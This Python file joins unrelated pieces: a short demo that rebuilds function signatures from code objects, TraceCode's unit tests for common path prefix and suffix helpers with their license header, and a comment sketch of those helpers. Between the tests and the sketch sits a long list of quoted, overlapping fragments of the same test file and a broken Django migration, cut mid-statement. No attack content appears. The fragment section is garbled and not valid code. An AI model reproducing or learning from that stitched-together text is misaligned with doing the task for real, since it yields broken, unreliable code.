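# defaults and closures are not stored on the code object, so defaults are
# lost and closure-carrying code objects fall through to the TypeError
# branch.

from inspect import signature as _demo_signature
from types import FunctionType as _DemoFunctionType


def _demo_code_obj_to_signature(code_obj):
    """Best-effort reconstruction of a `def` line from a code object."""
    try:
        func = _DemoFunctionType(code_obj, {})
        return f'def {code_obj.co_name}{_demo_signature(func)}:'
    except TypeError:
        # Code objects with free variables cannot be wrapped without a
        # closure tuple; fall back to a generic stub.
        return f'def {code_obj.co_name}(*args, **kwargs):'


if __name__ == '__main__':
    def greet(name, greeting):
        return f'{greeting}, {name}!'

    # Prints: def greet(name, greeting):
    print(_demo_code_obj_to_signature(greet.__code__))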
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/tracecode-toolkit/
# The TraceCode software is licensed under the Apache License version 2.0.
# Data generated with TraceCode require an acknowledgment.
# TraceCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with TraceCode or any TraceCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with TraceCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# TraceCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# TraceCode is a free and open source software analysis tool from nexB Inc. and others.
# Visit https://github.com/nexB/tracecode-toolkit/ for support and download.
#

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals

import unittest

from tracecode import pathutils


class TestPathUtils(unittest.TestCase):

    def test_common_path_prefix1(self):
        test = pathutils.common_path_prefix('/a/b/c', '/a/b/c')
        assert ('a/b/c', 3) == test

    def test_common_path_prefix2(self):
        test = pathutils.common_path_prefix('/a/b/c', '/a/b')
        assert ('a/b', 2) == test

    def test_common_path_prefix3(self):
        test = pathutils.common_path_prefix('/a/b', '/a/b/c')
        assert ('a/b', 2) == test

    def test_common_path_prefix4(self):
        test = pathutils.common_path_prefix('/a', '/a')
        assert ('a', 1) == test

    def test_common_path_prefix_path_root(self):
        test = pathutils.common_path_prefix('/a/b/c', '/')
        assert (None, 0) == test

    def test_common_path_prefix_root_path(self):
        test = pathutils.common_path_prefix('/', '/a/b/c')
        assert (None, 0) == test

    def test_common_path_prefix_root_root(self):
        test = pathutils.common_path_prefix('/', '/')
        assert (None, 0) == test

    def test_common_path_prefix_path_elements_are_similar(self):
        test = pathutils.common_path_prefix('/a/b/c', '/a/b/d')
        assert ('a/b', 2) == test

    def test_common_path_prefix_no_match(self):
        test = pathutils.common_path_prefix('/abc/d', '/abe/f')
        assert (None, 0) == test

    def test_common_path_prefix_ignore_training_slashes(self):
        test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/')
        assert ('a/b/c', 3) == test

    def test_common_path_prefix8(self):
        test = pathutils.common_path_prefix('/a/b/c/', '/a/b')
        assert ('a/b', 2) == test

    def test_common_path_prefix10(self):
        test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt')
        assert ('a/b', 2) == test

    def test_common_path_prefix11(self):
        test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt')
        assert ('a', 1) == test

    def test_common_path_prefix12(self):
        test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt')
        assert ('a', 1) == test

    def test_common_path_prefix13(self):
        test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/')
        assert ('a', 1) == test

    def test_common_path_prefix14(self):
        test = pathutils.common_path_prefix('/a/c/e/', '/a/d/')
        assert ('a', 1) == test

    def test_common_path_prefix15(self):
        test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt')
        assert ('a/c', 2) == test

    def test_common_path_prefix16(self):
        test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/')
        assert ('a/c', 2) == test

    def test_common_path_prefix17(self):
        test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/')
        assert ('a', 1) == test

    def test_common_path_prefix18(self):
        test = pathutils.common_path_prefix('/a/c/', '/a/')
        assert ('a', 1) == test

    def test_common_path_prefix19(self):
        test = pathutils.common_path_prefix('/a/c.txt', '/a/')
        assert ('a', 1) == test

    def test_common_path_prefix20(self):
        test = pathutils.common_path_prefix('/a/c/', '/a/d/')
        assert ('a', 1) == test

    def test_common_path_suffix(self):
        test = pathutils.common_path_suffix('/a/b/c', '/a/b/c')
        assert ('a/b/c', 3) == test

    def test_common_path_suffix_absolute_relative(self):
        test = pathutils.common_path_suffix('a/b/c', '/a/b/c')
        assert ('a/b/c', 3) == test

    def test_common_path_suffix_find_subpath(self):
        test = pathutils.common_path_suffix('/z/b/c', '/a/b/c')
        assert ('b/c', 2) == test

    def test_common_path_suffix_handles_relative_path(self):
        test = pathutils.common_path_suffix('a/b', 'a/b')
        assert ('a/b', 2) == test

    def test_common_path_suffix_handles_relative_subpath(self):
        test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c')
        assert ('b/c', 2) == test

    def test_common_path_suffix_ignore_and_strip_trailing_slash(self):
        test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/')
        assert ('b/c', 2) == test

    def test_common_path_suffix_return_None_if_no_common_suffix(self):
        test = pathutils.common_path_suffix('/a/b/c', '/')
        assert (None, 0) == test

    def test_common_path_suffix_return_None_if_no_common_suffix2(self):
        test = pathutils.common_path_suffix('/', '/a/b/c')
        assert (None, 0) == test

    def test_common_path_suffix_match_only_whole_segments(self):
        # only segments are honored, commonality within segment is ignored
        test = pathutils.common_path_suffix(
            'this/is/aaaa/great/path', 'this/is/aaaaa/great/path')
        assert ('great/path', 2) == test

    def test_common_path_suffix_two_root(self):
        test = pathutils.common_path_suffix('/', '/')
        assert (None, 0) == test

    def test_common_path_suffix_empty_root(self):
        test = pathutils.common_path_suffix('', '/')
        assert (None, 0) == test

    def test_common_path_suffix_root_empty(self):
        test = pathutils.common_path_suffix('/', '')
        assert (None, 0) == test

    def test_common_path_suffix_empty_empty(self):
        test = pathutils.common_path_suffix('', '')
        assert (None, 0) == test
# from __future__ import absolute_import", "('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0)", "from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert", "= pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/',", "'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/')", "provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY", "== test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test", "def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self):", "('a/b', 2) == test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2)", "as legal advice. Consult an Attorney # for any legal advice. # TraceCode", "'/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored,", "0) == test def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) ==", "assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c',", "is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def", "(None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None, 0)", "def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self):", "you publish or redistribute any data created with TraceCode or any TraceCode #", "def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self):", "only segments are honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path',", "test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test =", "from __future__ import print_function from __future__ import unicode_literals import unittest from tracecode import", "def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self):", "pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/a/b/c')", "== test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test", "pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_prefix2(self): test = 
pathutils.common_path_prefix('/a/b/c', '/a/b')", "not use this software except in compliance with the License. # You may", "with the following acknowledgment: # # Generated with TraceCode and provided on an", "KIND, either express or implied. No content created from # TraceCode should be", "0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) ==", "2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b', 2) ==", "'/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert", "are honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert", "test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self): test =", "test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): #", "= pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/',", "def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self):", "def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self):", "test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def", "All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed", "# Generated with TraceCode and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES", "legal advice. Consult an Attorney # for any legal advice. # TraceCode is", "== test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test", "'/a/') assert ('a', 1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert", "test = pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only", "under the License. 
# # When you publish or redistribute any data created", "= pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test = pathutils.common_path_suffix('',", "unittest from tracecode import pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c')", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND,", "(None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2)", "(None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3)", "2) == test def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) ==", "('b/c', 2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0)", "or agreed to in writing, software distributed # under the License is distributed", "CONDITIONS OF ANY KIND, either express or implied. See the License for the", "== test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test", "3) == test def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) ==", "1) == test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) ==", "== test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test", "test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test", "trademark of nexB Inc. # # You may not use this software except", "from __future__ import absolute_import from __future__ import division from __future__ import print_function from", "1) == test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) ==", "test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) == test def test_common_path_prefix15(self): test =", "any legal advice. # TraceCode is a free and open source software analysis", "== test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test", "0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment", "the License. # You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0", "and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download. 
# from __future__ import", "2) == test def test_common_path_suffix_ignore_and_strip_trailing_slash(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/', 'a//a/d//b/c/') assert ('b/c', 2) ==", "__future__ import absolute_import from __future__ import division from __future__ import print_function from __future__", "# # When you publish or redistribute any data created with TraceCode or", "pathutils.common_path_suffix('/', '/a/b/c') assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are", "an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF ANY KIND, either", "test def test_common_path_prefix18(self): test = pathutils.common_path_prefix('/a/c/', '/a/') assert ('a', 1) == test def", "be considered or used as legal advice. Consult an Attorney # for any", "pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b')", "== test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) == test", "pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/')", "assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/', '/') assert (None,", "open source software analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/", "test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test", "OR # CONDITIONS OF ANY KIND, either express or implied. See the License", "= pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt',", "test def test_common_path_suffix_handles_relative_subpath(self): test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c', 'a//a/d//b/c') assert ('b/c', 2) == test def", "in compliance with the License. # You may obtain a copy of the", "pathutils.common_path_suffix('/', '/') assert (None, 0) == test def test_common_path_suffix_empty_root(self): test = pathutils.common_path_suffix('', '/')", "= pathutils.common_path_suffix('', '/') assert (None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/',", "source software analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for", "software except in compliance with the License. # You may obtain a copy", "Visit https://github.com/nexB/tracecode-toolkit/ for support and download. # from __future__ import absolute_import from __future__", "'/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert", "test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert ('b/c', 2) == test def", "def test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self):", "TraceCode require an acknowledgment. # TraceCode is a trademark of nexB Inc. 
#", "(None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0)", "def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self):", "1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) ==", "('a/b', 2) == test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0)", "legal advice. # TraceCode is a free and open source software analysis tool", "== test def test_common_path_prefix_no_match(self): test = pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test", "nexB Inc. and others. All rights reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The", "tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and download.", "limitations under the License. # # When you publish or redistribute any data", "at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing,", "= pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt',", "def test_common_path_prefix2(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix3(self):", "def test_common_path_prefix11(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self):", "pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2) == test def test_common_path_suffix_two_root(self): test = pathutils.common_path_suffix('/',", "# TraceCode is a free and open source software analysis tool from nexB", "'/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert", "assert (None, 0) == test def test_common_path_suffix_return_None_if_no_common_suffix2(self): test = pathutils.common_path_suffix('/', '/a/b/c') assert (None,", "software distributed # under the License is distributed on an \"AS IS\" BASIS,", "the # specific language governing permissions and limitations under the License. # #", "assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b/b.txt') assert ('a/b',", "assert (None, 0) == test def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality", "== test def test_common_path_prefix3(self): test = pathutils.common_path_prefix('/a/b', '/a/b/c') assert ('a/b', 2) == test", "test def test_common_path_prefix19(self): test = pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def", "reserved. # http://nexb.com and https://github.com/nexB/tracecode-toolkit/ # The TraceCode software is licensed under the", "and provided on an \"AS IS\" BASIS, WITHOUT WARRANTIES # OR CONDITIONS OF", "is a trademark of nexB Inc. # # You may not use this", "WARRANTIES # OR CONDITIONS OF ANY KIND, either express or implied. 
No content", "pathutils.common_path_prefix('/', '/') assert (None, 0) == test def test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d')", "test_common_path_prefix_path_elements_are_similar(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/d') assert ('a/b', 2) == test def test_common_path_prefix_no_match(self): test", "test = pathutils.common_path_suffix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_absolute_relative(self): test =", "License version 2.0. # Data generated with TraceCode require an acknowledgment. # TraceCode", "or used as legal advice. Consult an Attorney # for any legal advice.", "'/a/b/c') assert ('b/c', 2) == test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert", "test = pathutils.common_path_suffix('/', '') assert (None, 0) == test def test_common_path_suffix_empty_empty(self): test =", "ANY KIND, either express or implied. No content created from # TraceCode should", "except in compliance with the License. # You may obtain a copy of", "agreed to in writing, software distributed # under the License is distributed on", "BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied.", "test def test_common_path_suffix_absolute_relative(self): test = pathutils.common_path_suffix('a/b/c', '/a/b/c') assert ('a/b/c', 3) == test def", "'/a') assert ('a', 1) == test def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert", "test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test =", "of the License at: http://apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed", "Apache License version 2.0. # Data generated with TraceCode require an acknowledgment. #", "class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) == test", "assert ('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a',", "commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path') assert ('great/path', 2)", "('a/b', 2) == test def test_common_path_prefix4(self): test = pathutils.common_path_prefix('/a', '/a') assert ('a', 1)", "support and download. # from __future__ import absolute_import from __future__ import division from", "should be considered or used as legal advice. Consult an Attorney # for", "analysis tool from nexB Inc. and others. # Visit https://github.com/nexB/tracecode-toolkit/ for support and", "# from __future__ import absolute_import from __future__ import division from __future__ import print_function", "test_common_path_prefix_root_path(self): test = pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test", "1) == test def test_common_path_prefix14(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/d/') assert ('a', 1) ==", "assert (None, 0) == test def test_common_path_suffix_root_empty(self): test = pathutils.common_path_suffix('/', '') assert (None,", "0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/') assert ('a/b/c', 3) ==", "from # TraceCode should be considered or used as legal advice. 
Consult an", "'/a/b/c') assert ('a/b/c', 3) == test def test_common_path_suffix_find_subpath(self): test = pathutils.common_path_suffix('/z/b/c', '/a/b/c') assert", "pathutils class TestPathUtils(unittest.TestCase): def test_common_path_prefix1(self): test = pathutils.common_path_prefix('/a/b/c', '/a/b/c') assert ('a/b/c', 3) ==", "= pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2) == test def test_common_path_prefix10(self): test = pathutils.common_path_prefix('/a/b/c.txt',", "'/a/c/f/') assert ('a/c', 2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert", "def test_common_path_prefix_path_root(self): test = pathutils.common_path_prefix('/a/b/c', '/') assert (None, 0) == test def test_common_path_prefix_root_path(self):", "2) == test def test_common_path_suffix_return_None_if_no_common_suffix(self): test = pathutils.common_path_suffix('/a/b/c', '/') assert (None, 0) ==", "test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1) == test def", "2) == test def test_common_path_prefix17(self): test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/') assert ('a', 1) ==", "# When you publish or redistribute any data created with TraceCode or any", "'/a/c/a.txt') assert ('a/c', 2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert", "= pathutils.common_path_prefix('/abc/d', '/abe/f') assert (None, 0) == test def test_common_path_prefix_ignore_training_slashes(self): test = pathutils.common_path_prefix('/a/b/c/',", "data created with TraceCode or any TraceCode # derivative work, you must accompany", "CONDITIONS OF ANY KIND, either express or implied. No content created from #", "you must accompany this data with the following acknowledgment: # # Generated with", "1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2) ==", "used as legal advice. Consult an Attorney # for any legal advice. 
#", "'/a/d/a.txt') assert ('a', 1) == test def test_common_path_prefix13(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/') assert", "('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1)", "= pathutils.common_path_prefix('/', '/a/b/c') assert (None, 0) == test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/',", "segments are honored, commonality within segment is ignored test = pathutils.common_path_suffix( 'this/is/aaaa/great/path', 'this/is/aaaaa/great/path')", "division from __future__ import print_function from __future__ import unicode_literals import unittest from tracecode", "redistribute any data created with TraceCode or any TraceCode # derivative work, you", "2) == test def test_common_path_prefix16(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/') assert ('a/c', 2) ==", "test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt') assert ('a', 1) == test def test_common_path_prefix12(self): test =", "pathutils.common_path_prefix('/a/c.txt', '/a/') assert ('a', 1) == test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/')", "import absolute_import from __future__ import division from __future__ import print_function from __future__ import", "('a', 1) == test def test_common_path_prefix12(self): test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/a.txt') assert ('a', 1)", "('a/b/c', 3) == test def test_common_path_prefix8(self): test = pathutils.common_path_prefix('/a/b/c/', '/a/b') assert ('a/b', 2)", "implied. No content created from # TraceCode should be considered or used as", "def test_common_path_suffix_match_only_whole_segments(self): # only segments are honored, commonality within segment is ignored test", "a trademark of nexB Inc. # # You may not use this software", "test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def test_common_path_suffix(self): test", "test def test_common_path_prefix20(self): test = pathutils.common_path_prefix('/a/c/', '/a/d/') assert ('a', 1) == test def", "created from # TraceCode should be considered or used as legal advice. Consult", "with TraceCode require an acknowledgment. # TraceCode is a trademark of nexB Inc.", "('a', 1) == test def test_common_path_prefix15(self): test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt') assert ('a/c', 2)", "== test def test_common_path_suffix_handles_relative_path(self): test = pathutils.common_path_suffix('a/b', 'a/b') assert ('a/b', 2) == test", "for support and download. # from __future__ import absolute_import from __future__ import division", "applicable law or agreed to in writing, software distributed # under the License", "require an acknowledgment. # TraceCode is a trademark of nexB Inc. # #", "== test def test_common_path_prefix_root_root(self): test = pathutils.common_path_prefix('/', '/') assert (None, 0) == test", "TraceCode software is licensed under the Apache License version 2.0. # Data generated" ]
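# The tests above exercise tracecode.pathutils.common_path_prefix and
# common_path_suffix, whose implementation is not part of this document.
# The sketch below is a minimal illustration of the behavior the tests imply
# (whole-segment matching only, leading/trailing/doubled slashes ignored,
# (None, 0) when nothing matches); it is an assumption added for clarity,
# not the actual tracecode implementation.

def _segments(path):
    # Split into non-empty segments, dropping leading, trailing and doubled slashes.
    return [seg for seg in path.split('/') if seg]


def _common_leading(segs1, segs2):
    # Collect whole segments shared from the left; return (joined_path, count).
    common = []
    for seg1, seg2 in zip(segs1, segs2):
        if seg1 != seg2:
            break
        common.append(seg1)
    if not common:
        return None, 0
    return '/'.join(common), len(common)


def common_path_prefix(path1, path2):
    # Longest run of whole leading segments shared by both paths.
    return _common_leading(_segments(path1), _segments(path2))


def common_path_suffix(path1, path2):
    # Longest run of whole trailing segments, reported in left-to-right order.
    common, count = _common_leading(_segments(path1)[::-1], _segments(path2)[::-1])
    if common is None:
        return None, 0
    return '/'.join(reversed(common.split('/'))), count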
[ "3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'),", "on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ]", "# Generated by Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models", "Generated by Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class", "by Django 3.2.8 on 2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration):", "= [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary", "2021-10-24 01:32 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('dim_sum',", "class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum',", "Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history',", "('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write summary here.'), ),", "models class Migration(migrations.Migration): dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField(", "dependencies = [ ('dim_sum', '0001_initial'), ] operations = [ migrations.AddField( model_name='dimsum', name='history', field=models.TextField(default='Write", 